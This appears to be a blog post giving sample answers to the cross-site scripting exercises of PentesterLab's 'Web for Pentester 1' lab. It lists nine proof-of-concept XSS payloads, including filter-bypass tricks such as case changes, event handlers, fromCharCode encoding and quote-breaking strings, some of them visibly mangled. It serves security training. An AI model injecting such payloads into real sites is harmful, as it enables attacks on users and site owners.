First series of posts will focus on web for pentester 1 by pentesterlab. A walk-through is provided on the site, which I recommend going through before looking at the answers I provide.
Here are some sample answers for the cross-site scripting section of the virtual machine. If you require some explanation as to what cross-site scripting is and how it works, there is a section in the walk-through accompanying this virtual machine on pentester labs, but also nice explanation by Daniel Miessler found here.
If your running some sort of ad-blocker or script-blocker, you may need to disable it for the answers to work.
example 1:
alert(1)
This causes an alert box to pop up.
example 2:
alert(1)
This will cause an alert box to pop up.
example 3:
<Script>alert(1)ript>
This will cause an alert box to pop up.
example 4:
<a onmousemove=”alert(1)”/>
Once you move the mouse over the web page, an alert box will pop up.
example 5:
eval(String.fromCharCode(097,108,101,114,116))(1)
This converts the ascii numbers into the string alert, which will cause an alert box to pop up.
example 6:
1″;alert(1)//
Again, another alert box will be displayed.
example 7:
1′;alert(1)//
Alert box will be displayed.
example 8:
in the address bar type:
/”>alert(String.fromCharCode(49))
converts the 49 into the number 1. similar to example 5, you can also replace the 49 with a string of ascii.
example 9:
after the # symbol
alert(1)
main 